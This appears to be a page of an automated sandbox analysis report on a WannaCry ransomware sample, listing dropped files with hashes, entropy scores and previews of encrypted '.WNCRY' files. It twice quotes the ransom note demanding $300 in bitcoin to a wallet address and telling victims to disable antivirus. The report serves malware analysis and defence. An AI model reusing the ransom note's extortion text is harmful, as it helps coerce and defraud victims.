                                SSDEEP:24:bk16CokuxWVsd4cc4A+U0E2ZfKtc8Iw3zZTiX4vIWnmkAY2+aNxHRFM:bk16Cokg0sU4Ah0ZfyVIw3Ja4vIWmk35
                                MD5:993CA612354F87F8B531F568F1349C30
                                SHA1:2B1C70A80BC0C9222454EF1CA292E985A7212F7F
                                SHA-256:29438FCB5DB37F3148A6AA1190C808E93B20524B13115F142CC8A9EE8C91F83F
                                SHA-512:CA7246E6A670D8A0FF8C8A56D1DB5B566D560BB62C775A4465F266782C359F8323DEC7D7E1C382BF0B0931B0CC5F30139ED71D7E268A41345EE5A441E2B3D1E7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....0....jE%.7%..).CU....t..N.aF....E./..m.R..n..I..#..k...t....j<..eG......Io..mW.............9.~'...I.....+.Cc.....D..S.p.....c ..Mot.&"N.....;.y.V..DSjm."..M.......8.x.....c.l..`..c.wnN.e......Fv..KT..r...i@.c..c..B ..).M....|....khF...C......in..............:....+.0c.N...NK..kg$."T..#..H.O.Jb.y3....i6cZ.k.^.~R.%...w.o..*.|=$.U......Y...l......E..W.j9...7...a@... `.2?`..(..p....w(.-Ft.%...;..6../....r........c .A.m3.k.....K..$...EX..s1...W..1.V..K.S\5W.J8..lS.......Gf..|.....<i.m..?.}E...HO..v..{.}..l....'.lT....mM....f....u...#!l.Z.E.m.....--......'X. y7.N.;.......{V........}.&%..T.....=._qk.....k.i....s-......-..n..'....H.......[.v..F...J-.c[.f[...t.......m.4.:W6}.Y..!-F..).1x.n$.8... N..7..+s...AckL5<....^.1.0..+.#.....x.....h;..}.h.PZ.f.UEF.G.&D..k...y_A>{.EjI3O.H......|.D+%g.lQn;.2O...........A..2}"\..-.....+=]...=}...,7..~..M..... .L............ ..P.lu@;$=z!...[]pj.......Y..fRF..Z.~#...a.+OW....>v..r...HB.....v

                                C:\Documents and Settings\user\Downloads\ZGGKNSUKOP.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840221560663818
                                Encrypted:false
                                SSDEEP:24:bkq9WKVrpT1OIvhRZjXKwfSBG3uOWPXEvGnI1DhcNOXYRmG3ICEv/rsec3gn:bkWNVRDDfk+5WPUuneVaOaICGrth
                                MD5:793749CC06DFD3BA53BBFB204C7D4A73
                                SHA1:16D8ECF4F6B21BD6E1700F129829C1F8AC9D8BE9
                                SHA-256:5A6C7783B4AFCC41611A19D9A6CB323ED7403FC7811541CD10A14C7C7DE97E4C
                                SHA-512:8F5EB902300414F446D2921D09BA4131C64E7BEBC2871BB46DE52315D451B8803AD6F4D1377EB3B1BE480EB48CF4BD240D70DCC3F8E566EC2DDE1E0D0298C04C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......L..P.1~J.+.......o.5.+...R..|..I$Uq....hJ.E.`g..{..(.}0..6.4...v.|..Qj...c=9.......3U..Ga.cE.8...W..dS.!.)..W...S.'..:..?..L..D.....#S[.$..!.....p.......c.9...ro...,.^....D........<0e...a.....I..7.Q....*..,..bs8...=..*"Z.};'A...j..5Q.>...................d9..."M...NC7...^.!.y..A..MBH0..#0.....Dc.....O;I.Xu.........../P.|/.e...;....{..S.............i.?c.2..kr.]...'(.7...........=.a..xZYT.....).FYR6..J.Y....e...+..j Q.9..V....#^O..z..os.0..;..NG.j....V.|.,...........j.3..>.[.....k9>.Y..W...5...@.J..._...g..vs..Q.3.!..p.Og..v.p...h...Q....f...@J....&X.......%=..@5.7r.1P.3./....1.|P[.............<... ..>.}*...!..u...3..D.j.&.B.Z..JegT.X..^i.c.4qd.wq.X...p....rk.Q..^....+..D.BW.DI..0..eB(..43..@./_...E.....Wt..H1.^.....{..~7..0.d..|..<.......q....D^3Ra@s.g...l.(?.d8.V..S.8;.k".'.+......W5....P.........eF.Z2..:A.mBt.0.,.{L'.Yr.D....m ..xH...Q..g.?.....Q.....r.N.....g.s?..A.[L..&.. .;"#x.@..`2z./}.'|.jrJ.Q#.?..*os..x..m.*..K...C

                                C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552179353449.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998505761086846
                                Encrypted:true
                                SSDEEP:3072:ilxfDuGKHHCmdcKE6OcHs5UjS3fVpG7DQ:ilpmPE6Oom9eQ
                                MD5:402DF254DA4CE14676AF08C61D6415C3
                                SHA1:E3E7B1E1EA97863CA1AB10CE235D972102CFCDE1
                                SHA-256:0629B63C824DDEBE755E466D4D63063462E003FB4CFA870CA27ED07E09F8259E
                                SHA-512:B5654D9BDC62B6090BA4B7B4FEE45F2357D8428A52DF688D24F95F95DBDDC6EAF96A75B98D99598CF0DFECFAB5C1A1D6CF67C4EA56D22B974CB1EEDA70C100CF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......G.u......u.&!..Z.2?.V.J...n.P...xbSJ.h.....n.G....~c....d..\....M.....z&...d.d....cY.:|f#]...*....StD.....|.".(P'N...3n..>.F.o.;....4L..(..dY...>...s.I..0.`/....`/.!/U:...|.}V..)....w...(Y._..`8@..M7........8...4...,S.4...,..u}...).....}.E....2{............0U.t)d.e..U...R.d.+....&.v..?....B8Y.......:.. ....`..{...i.ZNu.....& .J....De..H:6.E..z.1.$C....I?q.2s..M#ZF..E@...^X..7b...r....c...m.i.....L..M.....G..H.1j.d{u.o.....r...?.K#E........Y#.l...P..{../c.}.E.}.v.."j..s?..U.(.$..}V....y.)x.1.....m...m.a*..r..UY.`..z.?...V.}[A.g..0.g.T..@?.P...t.b.....R..+..uUI.79....D.y;..:}B.e.K.B... W...Q.|...0./.]..s..G(.T...b.!.6....#.alE....v#p.e..JF.K...}...J.St+...]._.[..fE6l.m.j$.....K +.. .x..|..l.h.|B$r..[....p.H2.ew.....~....8..#S....%.BGs8(Z..x........V.....&.....<K.`V..."b..p@..D<...."..f.S....V..z....;...q&!9.....H....#P9..).W......hh%.....~.i..7.X......m.`.{.H...PQ..V~..V6..@}.....#....]|dR;...Wd..s..M.....#.....wSoz.6"~.}J..

                                C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995224439986361
                                Encrypted:true
                                SSDEEP:768:gevdwsOioGwWkopt71XQi+Hvk/iGk/fR3abt5a6dls1Ebz1EdWvT:gevdfOi9hksgk/VkHQh5a6dBbn
                                MD5:5D46E574464E9B8E1D39BC18B1006AAA
                                SHA1:E46F8A929325FDC049431FE10DD9BAA13B3ADE24
                                SHA-256:047C59015559514967CA1A8F49129E760CA13E4AEA18F5365379B171E4FFEA5F
                                SHA-512:AA7D20DB7C2364305B4B7F82FC0923E868AAB1B349772B6562FDC810B4D8B588D83CD4428E4C22FA1171FDDC9AB2D3EF6D8C198B4CB69D68DE050EF534690922
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....L.Y..+$.D.......N..e..z5..Q..+..y0....)~.<..?&..M.[....h..X...g'...../..f...A8tB..~P..}8.#.o.._.K...66.x..,o::....h..U.*...e&^..^.v..5)..h7...8=.!.C...u...C'...:...?.q..vc%.}5.yN...P$e..x.t.q..|..7.c......^:!..cI.MO..3...\...|.M9J< 7.V!N.o...+e....v.......?D.c|.?.Q6...1h....8}f.....u.C...o.2h...r'..aO...e.s..4i....#F..._N.*...g.N4....6...\D.HZ..no).].%o.^l.....+*. ..`.c..9...w.F._.)b.7..)..&...\^ W..;....3..I..=.(....%...WN,....Rv........._.S..G...p$.:...1:.....<.^%J.)nbf.u.v(.I.I*._.......rs.R)j..^.q..$....Cl6.....(.R..l...R..ve#e.)..\.]z......q...:Z.~oIm.....i.G....+....:...L......9..A,..0.G..&.n.g.....T;..I.#?....dP' v. ...$..m..`..H<..3........ex.....3.S...u\......".7;..k.C...-....6.@v..D..w4..X.[.........A..........w...%..:.V..X."..g........-.....K...+.=.m.<.v.%be....).u......f^..h.O..].y......>/..y...-J.Z.W!..<.me5.....ZO..}.m.....8$r.......t%[kbP...c].t..0..u......a&.i......"...[.\...AXq..f4.cu..}&.a+u+`..f....4).

                                C:\ProgramData\Intel\GCC\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20760
                                Entropy (8bit):7.99135687516381
                                Encrypted:true
                                SSDEEP:384:xflSm2wno8JkzRbdH2BxrWKUl+o9sBitsncs5BcckqOF6buYG5l8L/GsDZiGIH2:xNokkzRbdYxrWKUMo9ltsd3DrObYG5pE
                                MD5:5F4298C3D49D4C887DE63384A219D65A
                                SHA1:4047029C1715A4F0224EAED31D15256DA884AE9C
                                SHA-256:2C911EF63C29CE755CF0586FB844A215D9A4F31EEAA6812BF35716AE7A406226
                                SHA-512:CF7AFC868EB2BD9492A073CC309F120EECD2C816B047EFD60C892B272216152B62B140E967548F8CDEA6C58D65A385F48EBB5274E17378A5D3DEC8366709A35D
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....h(.....(q.--./u.9L./.C..@.%.u$...n^p..`I_.6C....c*....P..ui...E..hQ.v.3r..+..9.8..z..8...E..4I..ORy..S..L{.C..9....}hF..P. ...?X.=..v...G...Sy......]...5R......s.@k..=z4..vz..L5d.].....C/..\.:.L... ..........N...%au...P.;.:....`..38!V.f.E..........P........*..!..T.<<....D._mxqH`..2n.~7f...~.Jo...ho...Z...>.X.W.q|..;...L3......8`R..].R.....W-s..TwT.li..EJ+..&..>O.?..l.5u.bO{...ui...L..F.$..Su..@Q.<.(.xE~4../$..&G./.p.`...|..(hx2t..;..K..!"%.o...:.?;..#[v.:.i]...sc..o.p..3........jO.....x.eT..t.....[4!Qr.....t.crZ.g_...uh...........G.#B...P.(...G...@7.0.1...&....io..vjcc.....B.*.=..h.=.&.(..}...!h...\...%.>.@U..e2..... Y.'.M..{...9...M.............ja.u..r.q....S.9r.t.L....F.#..sx...E..,.....E.....uD.).....5HI*..|<.{.$...U..U..%kR..`.fr.S.T...r.R..IF-..2R.M.~...6..z ..h%4tW)x.Ii.I...&H.].../.......&..|Y..6.K..$....Ju..\qOP.g.RZ......$.......n_J...#(. N.8._.6...9.7N.:JTA.vt~V:...rQ.t..;....v..,eX2).t......._..u.a.1h

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1368
                                Entropy (8bit):7.833229274628152
                                Encrypted:false
                                SSDEEP:24:bkoZAE890LBPHIxKSJhwIKtaJwH5t1wbbZDsFSwrfIr44K+P8/HhIDIp:bkvExLmKGh88Y5fwdWSw8Zpk5IDIp
                                MD5:3A8BA42E6CB4A554D2611C4243655D89
                                SHA1:1AFC3B8998B761F3247FEED62F5BF3288D7364CC
                                SHA-256:6904FA25E0D3F5DC7513443D3EC74FEC62EE2DD2FFC972BF5EF818EB496373A0
                                SHA-512:23D67888B2D87D964E324C1069C768D2F58333ADA53019F4A5BA01E4B31CF62B297B51BE81C6105350B60F51FB10B44004B924E5F7CA1D8F5D6504A7F617B6E4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....y.W^..9..2o....C6D.8S....`......pF..\X....f.|..x<I.V.....m.8.Q..W.&......#."4)..CQ.nq.L.8b..5...s....=.K...>..B.......\/.@#;........EN...@&.....Z.-18F.."1!.A+.:.u..&..e.j.V...}...|h._....-...bC.!5.....yn638...a...:........Z.._+.C.Nf.E......]W.-f.....=........T...e..V...<.f.I.M.l...B....b9..=.....=.o.g.s.......B....+c..........;..e.*P..:.....`ry.d..R.....CI.yL.>......9.Wvq...h...[..O{*...9..(.......//K[.'!G.8J.Q.......`3.w..3.....F..}X..'...Z.Vn)h-.;?..r...bE.#Go..6...Y...DM1....Z.PAw.?w:.`}.L..d..I.s..i.`D..b.q..jJf.#.jsD....L....b4@e<1.fd.6~M9.$D...4;.].R...N...... ..J..!. f..03.W..h......'..........i/XI.b..g>..>_dp.....z....cl...,o]q.+.........V%...z.....K..Xa.J......../.8..P.......P;..a...C....)s..{R.e....m0..D.....V.;3...[.A{.....{.V...5q...0.....|.. .....HT..4..I.*E.;..{........kud.3X.g....w.J....@.XR..^...w./.YYs|Gxo..K.wS>..EPz..FV.e.*m..VR...M.|.._....C..8.\.rQ.]...S..7..!z.....:.3j..@^.=......52.D?.'.....+~..6....X.

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9658633222462845
                                Encrypted:false
                                SSDEEP:96:ocJ9zbhdetqPaq52m0TjlX+rgDvMSeQV3s82l08EwxUNZo1RRcquaxFj:vzbbe0Pj5OlM6jVs8gpGN2z39xFj
                                MD5:DD35115478B5F07C899D5BDCC061DEE2
                                SHA1:1F6A498AC08D48A83C81C486A775124C5E6946BC
                                SHA-256:5E4AD93033D1230E8AF3553698B1FF5EC7039FEBCC3EA3C03329830F69DD4BA2
                                SHA-512:63962F1E6F8891E2D62014B0030912C959E583F3CD73C8CFFC3B80FDBECF6A9BD2D0F2A7AAD03555DE109C0635E11384EBB813F320080C44A8A2430E04485E55
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....4.Q3..%.>j..hk~cW.....~.5..%.2Q.nR`.Jt>.(t.....8.[.F...I.F...6..Sal};..Q..GJ...-...A......g...tR...U>...in..>;,....lxG.iS. (.7y..!P.v....0}e..sv.`.m,....3...r.]!.5.......X.j4N.....B..pjj>....#.....Q..8.N....,D.A..y...%...@...g.7..$..yd.{.[4...r.GE.d..................K..8y...}.....c.?Wnk....Am.[#D..(Hw$.h........z...Wa..E.GKc....T.4w..`.R....tg..).CuY.......&.GP...*E...3.....;.[...]@...'.l4.;9m.Wk.......h.K....;.Z...m.U.[U..3R..n..0..."].;...;...K.N.....!UT. p..b(...*Ph'..."p.........E.#..Q.u...-Ig....G.6...;.L..u...l._..Lu.......P.C.qOz=I0+O.a.BHR..i...ZG..?I.lZe}.%.....!HDR..N..K.X.......b...S.............x5T.$.%.N...G....E]...k...fKZ.......EtW8X7.9P.g@.W...K..75..L...&.#......R.O..ME........;....<X.U...&Yr...<G.nE...l?.C..pr..X..V.H......-.j.(..z.un..}@.L..P._n.YP...C..,...r;X:..I..*.....-.9. 1..1.....8...6>....v..A4.....E...x.N..l*?....`....d..*..y...Hw.qs5.........CK.am..3<1M.."Z-$.B.ov.u......2.d...x..5D..\...l....a2,.....^.

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5096
                                Entropy (8bit):7.9613632611220035
                                Encrypted:false
                                SSDEEP:96:oWRRQwg3dcEYBjywvWe7CgwEgm5WHUiHPulY3tk5+jY/Wr4R6EogmQkx4F6V:7/QhCFv9wDq/iHMYaYE/Y4AFQM4wV
                                MD5:A17FDAE00CEDDB34B552197373C79E7D
                                SHA1:446256E6449BE353B14ED9DFE3EF34E5F81E2304
                                SHA-256:F24BF1784673FDC7DACFFB1810C833A591864F039EF4E9FF2199F4EE08F43416
                                SHA-512:7DB6CA58A85411D7BBC228E83023D135D76A79865A9ABA1CFE269D1A1B3CB2784AE52BA4D77ED56C665E5E5234A8D994406351D0C06CC2403B34C76C332C88C8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......eN,\l...;y.p....Q.s.1QH..'U.C..0.....k..#}.!.gz........6jGvK....9' %mZ.#..@B....B...,x..$Pp...t..K....G..[... K.....`.0....'.....e..L.\+.Yk.:Z.......^. 8...d..w.+...:F....4.\a3...O+.n..r..l..D,.....P.F.]...1.....f..3.9....LyF.....3...................`$.x.s...I....r...7}u..k...<..c..6..Y.J0..D.n:m.A..8.<...G..jq...="Z6V.r..?....![..0$.c....>.;[..?~a....<:e..t.. ...].G.j{k"..p...25-q..8W.`.Z[...Ajf.....fO...W-$M...&yG%...].;.`.)..K..s`.7I.4..Cy....7.:F.H....0.D...,.Jh.}.{;'M......QQ.>..q.S.U../..<....t.@......../;q.....p.$D....I8i-Z.Tc...w.5.H{..'Zq....V..b..A.:`.8..l.<.I?Xl....<H.d....[.c%..[\Y..H...!.6wU......6.....d....I......F5J..F~.E.....Z.......7..|..-....F.......x.@Y.E.Q.=9....'.U.4..v.r...-...c*.t..3....4g..).-..T)._Lo)..,j_.....t..?[l..5..l.....!0.jK.#.;S...w.N.r6......q.;...e.P..h.".............G..S2..!..S%o..WM.......n...y....W.D.H.L..XU....D...j.q.?I...x3F.......{.g...........t4)TD..~...p..(=.k.U).3Z

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-30.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1032
                                Entropy (8bit):7.781047684038357
                                Encrypted:false
                                SSDEEP:24:bkKRSZxLLqBCmAkH1LRNdb6HfHvaekEvL8LM+Sw2i7XcQb1KB:bk4SZxDmAQLRNdQfHv5v3w2iwAEB
                                MD5:2BBEB274026F80662642FE8700F428BE
                                SHA1:B5F9B2E44C85B574407E2516F414440193F82480
                                SHA-256:783D437AC0AD6993553AA0441C22900B2C2CCE71EFACAC6EAD0E2E2192E59A04
                                SHA-512:C731A101CFADBC0E496BBF720BD0331AEF47E1BAFB4371FE8939E53F2AE2C59F2D397F19B8AC18B89845DB6D6B8304AE8FDD11D5B3EFD410132178061916B38F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........KD....\c^..4Lv..]...*.+.S,B|aY(e.(W...ey79.,.qW._UK,.l.i..eU.m.3...7i......TO.....VpR....g9-...T......5.9..U$.zw4c"..qy..%......ps.p_.d*.:...E(.4..8@ ........E._..A$.[.]....f0.kb .....\.K.)s..5.z.<....I.*...m.....td9h...:h..|..../$.r.+..h.q..............aQ....;w.....L3y.2..i.q..v.Q\..%.y..C.&NP.y...p.8.....Y....S..Y.0!....@k..I.@O..;{U.&..#*..m;.@z4.S.....y<^...3.....v.MDp.pz.s.:..$...%.ef.1....29...Z...Y...Y*.b.....{Q...}Q...5^.|.....MCr;&...{bQ...6.&....1...F.....u.H"..%..5.x.%..T..;E......c.F........,B..U.a.<R.6.:vLD`6.Ua8..h^(.%.M...M.....9..Yh...u.......cS....V.1)[9%.F.......8z........y>M...bG...*.-...Qx.. .x.....v..{.2...g.&.!.co`.0..M....sD........>C.E.a).G.... CUf...h%.S..[.c.~.%.l..}...{!~-..Y.@.."B..?&.Y.h.$....Q..A9..........H.Z-R..e....T.f..6....s.O.4.^...;....%x...x.G|,....n,Ip....(..8..a.l....1.S.;{*.t.}1.N.BQ.u.....\gW...~Y.....B.&..qv....7....I..H.b.U...Z...e~+.>...3..%Lu.^_/....M?&z...)Z..r.;.xi.${..

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2022-01-20.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1112
                                Entropy (8bit):7.813633193202283
                                Encrypted:false
                                SSDEEP:24:bk1IHNK8c7MVBvfBi/HneYQRDXrA01N0lqp9QkZxiVKTe:bk1Nt01o/bgDXrtylM9Q2xiMa
                                MD5:89D17B244D1C49CAFD0318A51051D603
                                SHA1:EB971DE6298029ABE7C72D8FF63E440D3DE15B0B
                                SHA-256:92F884B4859DA809A254573E48C7F30544F5EABF01891395F58149BA147A9A78
                                SHA-512:7367B409CB715BCD2D2319EE1F728C116A867C2130427212537F840511AD235F7004233BD3205ECACEFED5B35DDE7D739140537AD1D57E76B0DB7E89BE2B39DB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......(...Y..!_..sU0N{.L.V.\...2h.G.[7....[2..b.4.[.:K.y...|.Z.he-2.=.m..b.1u..<|.f.2...C....[(V.9..'.O....*....q.....8.H.......!J.M..DJ>...9l..M..Z.l.......D.".W......._**OL.}O G./.mp..kb....sm.W.`..<..........-.+.J.k.[......"Hl..?.......E|...~....>........*.W.T.a..M..../.F...@"..O.I...F.\3....*.)...b....o..b..N.p...w....(N1$.1..).c...^f$..c|s.B.h..&@.V...~.n.........Ws.#......o...J...$....dG.*sa.v.L.\.r'!.I.......D.....q..-..<..:.B.l...q.....m....&...r.mJA.&....58B.*.?.Q2..X8.[...:.F...|z..,.........}._.H..V....`!!n..@K'Q...y.{".bp>-..J..[X/....u....S...w.tE_..9j.H..M[........4w.HzI.P*v.r.y....y.,.....5.R............?g..Z*....2>...r...+.....V..g...dm.o....../N.).T.....4JA.KuFt..........S3.w.Q..0Y&#%k.H....!.]R......5..E..R.)s.f..A.j..2.../H.(...\..Z.=).dU.d..E.Iw._>.B..5.M.M.N..........E..8......=.....Z..A>..~...5n.....jX..&.8t...>.p.cg..z...N....Z....xt...........l.Er.-S.[.q..~l..g......'@...s.q......bk...Oc...bv6T.B

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2022-02-23.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1768
                                Entropy (8bit):7.899991746181669
                                Encrypted:false
                                SSDEEP:48:bk6MF//6aNjgWzIHwfGTuqbFiGriJGrgPSSK:o6MxhNUHYqpjiY/Z
                                MD5:28EF705A7680E734E0CF6ABB3C3ACB1F
                                SHA1:12EE1C6322735387FCEE27F1447E74BCA851224B
                                SHA-256:5A303191ACB615E631BE3D99078DEC936ED6B6B6FC19B8DAF54AB6BEEB27DA36
                                SHA-512:DAC79AC9C646225987F6356871E955C7B21D4E99295488AB566CB5D65F13813DEB61DE4D31569169FB691FD29F0754AEF09DC0498424756E1118265E850EAAFA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......U./..Wh\*...SX.D|.=;.aL.D..........t'q....i.<....0u.,...S.%.N.q....,..Wj.y.....~...U.W.y.*.`...sj.p...UN%.I(^....W....h.c..R.&<....|?.n?/.R9..o.l..oI.}6..$............1..9...y....WO.@w...\.&H..)*4.d..1.W.U).YU....(..1f..}~3y=...!.o....._.J............... ..P...-.....3..d...Y`..9;.KX..?X..2:....\A"...z..w\s.3.l/.............g}.L.....3.w.....,.....%.Y..X..8]].d.b..B...l.>P..L .....,....`..(......7..~5.u..%+.Hj.... ...r.+...@K...r...q..h[....7..R......8....._<....}:...8.%.....D...9.((.v!.r.kU(D.........R.V...U.W.cD.....B.:...-g..K:....Esx..C>.#.....Y.L.[.}.......5...'..[6.A6)O. ...{.._.....T)..0.|h........6....i...2..C..g&.Tc1..L...aaenUU.<.q(K.....2......[1..e/{.7...k.S... ...5.h}.p..Y....xB....O.BS....'.L...........A.w..~...I.r..L..5RV.^.M...H..3b1?[SR.E.....g@0.+..P7...W....z...........;.R....~...../..$.b....i....r....WV..a........^.k.?.df,..q%.w..K...d.W.m.4.&.1`,\=...o.V....qc.I..+....r.{HL.x.0.c.o..P.{.XfW"....

                                C:\ProgramData\Intel\GCC\gcc_svc_log_2023-01-31.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1032
                                Entropy (8bit):7.795895638319137
                                Encrypted:false
                                SSDEEP:24:bkstgTVGQ1/7bHzOQmZ3erGb4z3CmIUsCcvPokyG17NG+WX:bkKmG+/vz5uAztunoGxY5
                                MD5:A25B81A58FB62AAE32BE3F8F6249873F
                                SHA1:50E3B4D872499B8F3CCBF1181EDFEA6479A94308
                                SHA-256:0513DDDAC481C043C8D86596ED7260F7F4A0F0EA07EFA20616C0D117601D7E08
                                SHA-512:08EB319074CF96CCC45E82F7E648C51ED01BCF784A427AB0A631D6D19A0317A80DA455C1F0C5016295420D4BFE103857D93CE8A8F3AB380548D43D6921B41175
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Y...}..........S.^..<C,...|L...%.>y...}|..i'....R....N6x.. ... .........V|.x..k.;FI{...w..[[......A..t_RH.......4.=".L:#....@.6!..dz.E.[.../.....s...ZE...AVB.Cs..DG..9.%....a..j..>......DN,*-.....X@....vk...a.4.i..n|.1@..j$@;..q...%.u.![.........................4..~..N.......t#f.O^G.j...M....SO.`RE\W./..).|..e.W.<`6...b.....~=...x..2T.f...,.\..3..,^..\.r{......E.1.m#.Q....6.,.....=...E.#-.8.Sttb.o...+707...M.....~.~..u~.Br.......(#J.+.. ..........A.0 .........9N.e...G.s>....|..x0Q.v....~.M.!..p..8..z.....L.i;Ok.j[.......<..g.%`...9..A....Yi7..i.M..N...C.`......5.<....m.j...K..*$U.....f..s'....y#.q..t....Y..]c,..l'......8.Q=^Uq .EQ..+..a..i..e!...%PA....b.......~.b...@.......A .h.{...%.r..9.q...~.r1..+3...E..MK}.=.r D..m...;j.r..q6!zp..n..d....^..*d..q..x.\....M...y(o..-.p..1.eU..6..8>i@F.'z..K..}.."8P...B.*..-'...........%..........~zN....B/2JG..K...\ ..&..!p..:....T..?.....n........D....p/[r....2.o.Fw.AB.i.>.^.J......

                                C:\ProgramData\Microsoft\AppV\Setup\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
